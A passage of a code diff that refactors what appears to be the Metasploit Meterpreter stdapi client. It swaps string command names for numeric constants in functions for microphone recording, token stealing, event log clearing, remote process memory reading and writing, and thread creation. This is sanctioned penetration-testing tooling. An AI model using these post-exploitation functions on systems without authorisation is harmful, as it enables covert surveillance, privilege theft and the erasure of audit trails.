+    request = Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_START)
+    request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
+    response = client.send_request(request)
+    return nil unless response.result == 0
+
+    Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS, response)
+  end
+
+  # Stop recording from microphone
+  def mic_stop
+    client.send_request(Packet.create_request(COMMAND_ID_STDAPI_AUDIO_MIC_STOP))
+    true
   end
+
+  attr_accessor :client
+end
+
+end
+end
+end
+end
+end
 end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
index 70b1ef4d7e9c5..9361aa41c0552 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
@@ -53,7 +53,7 @@ def each_interface(&block)
   #
   # @return [Array<Interface>]
   def get_interfaces
-    request = Packet.create_request('stdapi_net_config_get_interfaces')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES)
     ifaces  = []
 
     response = client.send_request(request)
@@ -112,7 +112,7 @@ def get_interfaces
   #
 
   def get_netstat
-    request = Packet.create_request('stdapi_net_config_get_netstat')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT)
                 netstat  = []
 
     response = client.send_request(request)
@@ -148,7 +148,7 @@ def get_netstat
   #
 
   def get_arp_table
-    request = Packet.create_request('stdapi_net_config_get_arp_table')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE)
                 arps  = []
 
     response = client.send_request(request)
@@ -178,7 +178,7 @@ def each_route(&block)
   # Returns an array of routes with each element being a Route.
   #
   def get_routes
-    request = Packet.create_request('stdapi_net_config_get_routes')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES)
     routes  = []
 
     response = client.send_request(request)
@@ -203,13 +203,13 @@ def get_routes
   # Adds a route to the target machine.
   #
   def add_route(subnet, netmask, gateway)
-    request = Packet.create_request('stdapi_net_config_add_route')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE)
 
     request.add_tlv(TLV_TYPE_SUBNET_STRING, subnet)
     request.add_tlv(TLV_TYPE_NETMASK_STRING, netmask)
     request.add_tlv(TLV_TYPE_GATEWAY_STRING, gateway)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
@@ -218,13 +218,13 @@ def add_route(subnet, netmask, gateway)
   # Removes a route from the target machine.
   #
   def remove_route(subnet, netmask, gateway)
-    request = Packet.create_request('stdapi_net_config_remove_route')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE)
 
     request.add_tlv(TLV_TYPE_SUBNET_STRING, subnet)
     request.add_tlv(TLV_TYPE_NETMASK_STRING, netmask)
     request.add_tlv(TLV_TYPE_GATEWAY_STRING, gateway)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
@@ -233,7 +233,7 @@ def remove_route(subnet, netmask, gateway)
   # Get's the current proxy configuration
   #
   def get_proxy_config()
-    request = Packet.create_request('stdapi_net_config_get_proxy')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY)
 
     response = client.send_request(request)
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb
index 951d4870b4070..9a3035432b3d4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb
@@ -32,7 +32,7 @@ def initialize(client)
   end
 
   def resolve_host(hostname, family=AF_INET)
-    request = Packet.create_request('stdapi_net_resolve_host')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_RESOLVE_HOST)
     request.add_tlv(TLV_TYPE_HOST_NAME, hostname)
     request.add_tlv(TLV_TYPE_ADDR_TYPE, family)
 
@@ -45,7 +45,7 @@ def resolve_host(hostname, family=AF_INET)
   end
 
   def resolve_hosts(hostnames, family=AF_INET)
-    request = Packet.create_request('stdapi_net_resolve_hosts')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS)
     request.add_tlv(TLV_TYPE_ADDR_TYPE, family)
 
     hostnames.each do |hostname|
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
index e1def0be8be62..3b43bb6a331b3 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
@@ -101,7 +101,7 @@ def close_write
   def shutdown(how = 1)
     return false if self.cid.nil?
 
-    request = Packet.create_request('stdapi_net_socket_tcp_shutdown')
+    request = Packet.create_request(COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN)
 
     request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how)
     request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
index fdc3d9b58cbc4..2c5396a9ff972 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
@@ -29,12 +29,12 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel
   #
   # This is the request handler which is registered to the respective meterpreter instance via
   # Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
-  # for a 'stdapi_net_tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
+  # for a COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN will be processed here. We create a new TcpClientChannel for each request
   # received and store it in the respective tcp server channels list of new pending client channels.
   # These new tcp client channels are passed off via a call the the tcp server channels accept() method.
   #
   def self.request_handler(client, packet)
-    return false unless packet.method == "stdapi_net_tcp_channel_open"
+    return false unless packet.method == COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN
 
     cid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
     pid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb
index 71a502e772b4e..26dd679c84e3f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/library.rb
@@ -254,7 +254,7 @@ def process_function_call(function, args, client)
     end
 
     #puts "\n\nsending Stuff to meterpreter"
-    request = Packet.create_request('stdapi_railgun_api')
+    request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_API)
     request.add_tlv(TLV_TYPE_RAILGUN_SIZE_OUT, out_only_size_bytes)
 
     request.add_tlv(TLV_TYPE_RAILGUN_STACKBLOB, literal_pairs_blob)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
index c2c863c5a0272..5fad9f432963e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
@@ -56,7 +56,7 @@ def initialize(client, parent, consts_mgr)
     end
 
     def call(functions)
-      request = Packet.create_request('stdapi_railgun_api_multi')
+      request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_API_MULTI)
       function_results = []
       layouts          = []
       functions.each do |f|
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
index aacafacb9b9c3..09606a236e642 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -165,7 +165,7 @@ def memread(address, length)
 
     raise "Invalid parameters." if(not address or not length)
 
-    request = Packet.create_request('stdapi_railgun_memread')
+    request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_MEMREAD)
 
     request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address)
     request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length)
@@ -187,7 +187,7 @@ def memwrite(address, data, length=nil)
     length = data.length if length.nil?
     raise "Invalid parameters." if(not address or not data or not length)
 
-    request = Packet.create_request('stdapi_railgun_memwrite')
+    request = Packet.create_request(COMMAND_ID_STDAPI_RAILGUN_MEMWRITE)
     request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address)
     request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data)
     request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
index 7f0164dd6b710..c176a9f296e0c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
@@ -37,6 +37,10 @@ module Stdapi
 ###
 class Stdapi < Extension
 
+  def self.extension_id
+    EXTENSION_ID_STDAPI
+  end
+
   #
   # Initializes an instance of the standard API extension.
   #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
index 9b488161fbb53..725a0f0028fcc 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@@ -31,7 +31,7 @@ def initialize(client)
   #
   def getuid(refresh: true)
     if @uid.nil? || refresh
-      request  = Packet.create_request('stdapi_sys_config_getuid')
+      request  = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID)
       response = client.send_request(request)
       @uid = client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) )
     end
@@ -42,7 +42,7 @@ def getuid(refresh: true)
   # Gets the SID of the current process/thread.
   #
   def getsid
-    request = Packet.create_request('stdapi_sys_config_getsid')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID)
     response = client.send_request(request)
     response.get_tlv_value(TLV_TYPE_SID)
   end
@@ -58,7 +58,7 @@ def is_system?
   # Returns a list of currently active drivers used by the target system
   #
   def getdrivers
-    request = Packet.create_request('stdapi_sys_config_driver_list')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST)
     response = client.send_request(request)
 
     result = []
@@ -78,7 +78,7 @@ def getdrivers
   # If a requested value doesn't exist in the response, then the value wasn't found.
   #
   def getenvs(*var_names)
-    request = Packet.create_request('stdapi_sys_config_getenv')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETENV)
 
     var_names.each do |v|
       request.add_tlv(TLV_TYPE_ENV_VARIABLE, v)
@@ -108,7 +108,7 @@ def getenv(var_name)
   # Returns the target's local system date and time.
   #
   def localtime
-    request = Packet.create_request('stdapi_sys_config_localtime')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME)
     response = client.send_request(request)
     (response.get_tlv_value(TLV_TYPE_LOCAL_DATETIME) || "").strip
   end
@@ -117,7 +117,7 @@ def localtime
   # Returns a hash of information about the remote computer.
   #
   def sysinfo(refresh: false)
-    request  = Packet.create_request('stdapi_sys_config_sysinfo')
+    request  = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO)
     if @sysinfo.nil? || refresh
       response = client.send_request(request)
 
@@ -144,14 +144,14 @@ def sysinfo(refresh: false)
   # Calls RevertToSelf on the remote machine.
   #
   def revert_to_self
-    client.send_request(Packet.create_request('stdapi_sys_config_rev2self'))
+    client.send_request(Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF))
   end
 
   #
   # Steals the primary token from a target process
   #
   def steal_token(pid)
-    req = Packet.create_request('stdapi_sys_config_steal_token')
+    req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN)
     req.add_tlv(TLV_TYPE_PID, pid.to_i)
     res = client.send_request(req)
     client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) )
@@ -161,7 +161,7 @@ def steal_token(pid)
   # Drops any assumed token
   #
   def drop_token
-    req = Packet.create_request('stdapi_sys_config_drop_token')
+    req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN)
     res = client.send_request(req)
     client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) )
   end
@@ -170,7 +170,7 @@ def drop_token
   # Enables all possible privileges
   #
   def getprivs
-    req = Packet.create_request('stdapi_sys_config_getprivs')
+    req = Packet.create_request(COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS)
     ret = []
     res = client.send_request(req)
     res.each(TLV_TYPE_PRIVILEGE) do |p|
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
index cb2d556520818..d09ac6b538bea 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
@@ -34,7 +34,7 @@ class << self
   #++
   #
   def EventLog.open(name)
-    request = Packet.create_request('stdapi_sys_eventlog_open')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN)
 
     request.add_tlv(TLV_TYPE_EVENT_SOURCENAME, name);
 
@@ -73,7 +73,7 @@ def self.finalize(client,handle)
   # Return the number of records in the event log.
   #
   def length
-    request = Packet.create_request('stdapi_sys_eventlog_numrecords')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS)
 
     request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle);
 
@@ -86,7 +86,7 @@ def length
   # the low level read function (takes flags, not hash, etc).
   #
   def _read(flags, offset = 0)
-    request = Packet.create_request('stdapi_sys_eventlog_read')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_READ)
 
     request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle)
     request.add_tlv(TLV_TYPE_EVENT_READFLAGS, flags)
@@ -150,7 +150,7 @@ def each_backwards
   # Return the record number of the oldest event (not necessarily 1).
   #
   def oldest
-    request = Packet.create_request('stdapi_sys_eventlog_oldest')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST)
 
     request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle);
 
@@ -167,11 +167,11 @@ def oldest
   #++
   #
   def clear
-    request = Packet.create_request('stdapi_sys_eventlog_clear')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR)
 
     request.add_tlv(TLV_TYPE_EVENT_HANDLE, self.handle);
 
-    response = client.send_request(request)
+    client.send_request(request)
     return self
   end
 
@@ -179,9 +179,9 @@ def clear
   # Close the event log
   #
   def self.close(client, handle)
-    request = Packet.create_request('stdapi_sys_eventlog_close')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE)
     request.add_tlv(TLV_TYPE_EVENT_HANDLE, handle);
-    response = client.send_request(request, nil)
+    client.send_request(request, nil)
     return nil
   end
 
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
index 89da1f5496ac6..e18b81e6bc964 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
@@ -28,7 +28,7 @@ class <<self
   # Calls ExitWindows on the remote machine with the supplied parameters.
   #
   def Power._exitwindows(flags, reason = 0, force = 0) # :nodoc:
-    request = Packet.create_request('stdapi_sys_power_exitwindows')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS)
 
     flags |= EWX_FORCEIFHUNG if force == 1
     flags |= EWX_FORCE       if force == 2
@@ -36,9 +36,7 @@ def Power._exitwindows(flags, reason = 0, force = 0) # :nodoc:
     request.add_tlv(TLV_TYPE_POWER_FLAGS, flags);
     request.add_tlv(TLV_TYPE_POWER_REASON, reason);
 
-    response = client.send_request(request)
-
-    return response
+    client.send_request(request)
   end
 
   #
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
index 63f576ef4d098..7e40b1c4ce17f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -82,7 +82,7 @@ def Process.open(pid = nil, perms = nil)
   # Low-level process open.
   #
   def Process._open(pid, perms, inherit = false)
-    request = Packet.create_request('stdapi_sys_process_attach')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH)
 
     if (pid == nil)
       pid = 0
@@ -116,7 +116,7 @@ def Process._open(pid, perms, inherit = false)
   #   InMemory    => true/false
   #
   def Process.execute(path, arguments = nil, opts = nil)
-    request = Packet.create_request('stdapi_sys_process_execute')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE)
     flags   = 0
 
     # If we were supplied optional arguments...
@@ -192,7 +192,7 @@ def Process.execute(path, arguments = nil, opts = nil)
   # Kills one or more processes.
   #
   def Process.kill(*args)
-    request = Packet.create_request('stdapi_sys_process_kill')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_KILL)
 
     args.each { |id|
       request.add_tlv(TLV_TYPE_PID, id)
@@ -207,7 +207,7 @@ def Process.kill(*args)
   # Gets the process id that the remote side is executing under.
   #
   def Process.getpid
-    request = Packet.create_request('stdapi_sys_process_getpid')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GETPID)
 
     response = client.send_request(request)
 
@@ -226,7 +226,7 @@ def Process.each_process(&block)
   # 'ppid', 'name', 'path', 'user', 'session' and 'arch'.
   #
   def Process.get_processes
-    request   = Packet.create_request('stdapi_sys_process_get_processes')
+    request   = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES)
     processes = ProcessList.new
 
     response = client.send_request(request)
@@ -323,9 +323,9 @@ def path
   # Closes the handle to the process that was opened.
   #
   def self.close(client, handle)
-    request = Packet.create_request('stdapi_sys_process_close')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE)
     request.add_tlv(TLV_TYPE_HANDLE, handle)
-    response = client.send_request(request, nil)
+    client.send_request(request, nil)
     handle = nil;
     return true
   end
@@ -347,11 +347,11 @@ def close(handle = self.handle)
   # occur as we may be waiting indefinatly for the process to terminate.
   #
   def wait( timeout = -1 )
-    request = Packet.create_request('stdapi_sys_process_wait')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_WAIT)
 
     request.add_tlv(TLV_TYPE_HANDLE, self.handle)
 
-    response = self.client.send_request(request, timeout)
+    self.client.send_request(request, timeout)
 
     self.handle = nil
 
@@ -366,7 +366,7 @@ def wait( timeout = -1 )
   # Gathers information about the process and returns a hash.
   #
   def get_info
-    request = Packet.create_request('stdapi_sys_process_get_info')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO)
     info    = {}
 
     request.add_tlv(TLV_TYPE_HANDLE, handle)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
index 861300017c7a0..3c0fdf563bfac 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
@@ -49,7 +49,7 @@ def [](key)
   # Loads an image file into the context of the process.
   #
   def load(image_path)
-    request = Packet.create_request('stdapi_sys_process_image_load')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_IMAGE_FILE_PATH, image_path)
@@ -64,7 +64,7 @@ def load(image_path)
   # library.
   #
   def get_procedure_address(image_file, procedure)
-    request = Packet.create_request('stdapi_sys_process_image_get_proc_address')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_IMAGE_FILE, image_file)
@@ -80,12 +80,12 @@ def get_procedure_address(image_file, procedure)
   # process by its base address.
   #
   def unload(base)
-    request = Packet.create_request('stdapi_sys_process_image_unload')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_IMAGE_BASE, base)
 
-    response = process.client.send_request(request)
+    process.client.send_request(request)
 
     return true
   end
@@ -102,7 +102,7 @@ def each_image(&block)
   # have keys for 'name', 'path', and 'base'.
   #
   def get_images
-    request = Packet.create_request('stdapi_sys_process_image_get_images')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES)
     images  = []
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
index 5c3fc7fd330ab..e1c545ce95b7d 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
@@ -77,7 +77,7 @@ def allocate(length, protection = nil, base = nil)
   # Low-level memory allocation.
   #
   def _allocate(base, length, allocation_type, protection)
-    request = Packet.create_request('stdapi_sys_process_memory_allocate')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE)
 
     # Populate the request
     if (base != nil)
@@ -106,13 +106,13 @@ def free(base, length = 0)
   # Low-level memory deallocation.
   #
   def _free(base, length)
-    request = Packet.create_request('stdapi_sys_process_memory_free')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
     request.add_tlv(TLV_TYPE_LENGTH, length)
 
-    response = process.client.send_request(request)
+    process.client.send_request(request)
 
     return true
   end
@@ -121,7 +121,7 @@ def _free(base, length)
   # Read memory from the context of a process and return the buffer.
   #
   def read(base, length)
-    request = Packet.create_request('stdapi_sys_process_memory_read')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
@@ -137,7 +137,7 @@ def read(base, length)
   # actually written.
   #
   def write(base, data)
-    request = Packet.create_request('stdapi_sys_process_memory_write')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
@@ -152,7 +152,7 @@ def write(base, data)
   # Queries an address for information about its state.
   #
   def query(base)
-    request = Packet.create_request('stdapi_sys_process_memory_query')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY)
 
     request.add_tlv(TLV_TYPE_HANDLE, process.handle)
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
@@ -199,7 +199,7 @@ def query(base)
   # Change the protection masks on the region supplied in base.
   #
   def protect(base, length = nil, protection = nil)
-    request = Packet.create_request('stdapi_sys_process_memory_protect')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT)
 
     if (length == nil)
       length = 4096
@@ -231,12 +231,12 @@ def protect(base, length = nil, protection = nil)
   # handle is ignored.
   #
   def lock(base, length)
-    request = Packet.create_request('stdapi_sys_process_memory_lock')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK)
 
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
     request.add_tlv(TLV_TYPE_LENGTH, length)
 
-    response = process.client.send_request(request)
+    process.client.send_request(request)
 
     return true
   end
@@ -248,12 +248,12 @@ def lock(base, length)
   # handle is ignored.
   #
   def unlock(base, length)
-    request = Packet.create_request('stdapi_sys_process_memory_unlock')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK)
 
     request.add_tlv(TLV_TYPE_BASE_ADDRESS, base)
     request.add_tlv(TLV_TYPE_LENGTH, length)
 
-    response = process.client.send_request(request)
+    process.client.send_request(request)
 
     return true
   end
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
index 9487ebfbd0f55..9342795010f23 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
@@ -45,7 +45,7 @@ def initialize(process)
   # of the process and returns a Sys::Thread instance.
   #
   def open(tid, access = THREAD_ALL)
-    request = Packet.create_request('stdapi_sys_process_thread_open')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN)
     real    = 0
 
     # Translate access
@@ -78,7 +78,7 @@ def open(tid, access = THREAD_ALL)
   # returns a Sys::Thread instance.
   #
   def create(entry, parameter = nil, suspended = false)
-    request = Packet.create_request('stdapi_sys_process_thread_create')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE)
     creation_flags = 0
 
     request.add_tlv(TLV_TYPE_PROCESS_HANDLE, process.handle)
@@ -119,7 +119,7 @@ def each_thread(&block)
   # Returns an array of thread identifiers.
   #
   def get_threads
-    request = Packet.create_request('stdapi_sys_process_thread_get_threads')
+    request = Packet.create_request(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS)
     threads = []
 
     request.add_tlv(TLV_TYPE_PID, process.pid)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
index cb633f7233c4d..32a2fcd89af86 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -41,7 +41,7 @@ class << self
   #
 
   def Registry.load_key(root_key,base_key,hive_file)
-    request = Packet.create_request('stdapi_registry_load_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY)
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
     request.add_tlv(TLV_TYPE_FILE_PATH, client.unicode_filter_decode( hive_file ))
@@ -51,7 +51,7 @@ def Registry.load_key(root_key,base_key,hive_file)
   end
 
   def Registry.unload_key(root_key,base_key)
-    request = Packet.create_request('stdapi_registry_unload_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY)
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
     response = client.send_request(request)
@@ -65,7 +65,7 @@ def Registry.open_key(root_key, base_key, perm = KEY_READ)
       return RegistrySubsystem::RegistryKey.new(client, root_key, base_key, perm, root_key)
     end
 
-    request = Packet.create_request('stdapi_registry_open_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY)
 
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
@@ -86,7 +86,7 @@ def Registry.open_key(root_key, base_key, perm = KEY_READ)
   # @raise [TimeoutError] if the timeout expires when waiting the answer
   # @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
   def Registry.check_key_exists(root_key, base_key)
-    request = Packet.create_request('stdapi_registry_check_key_exists')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS)
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
     request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
     response = client.send_request(request)
@@ -100,7 +100,7 @@ def Registry.check_key_exists(root_key, base_key)
   #
   def Registry.open_remote_key(target_host, root_key)
 
-    request = Packet.create_request('stdapi_registry_open_remote_key')
+    request = Packet.create_request(COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY)
 
     request.add_tlv(TLV_TYPE_TARGET_HOST, target_host)
     request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
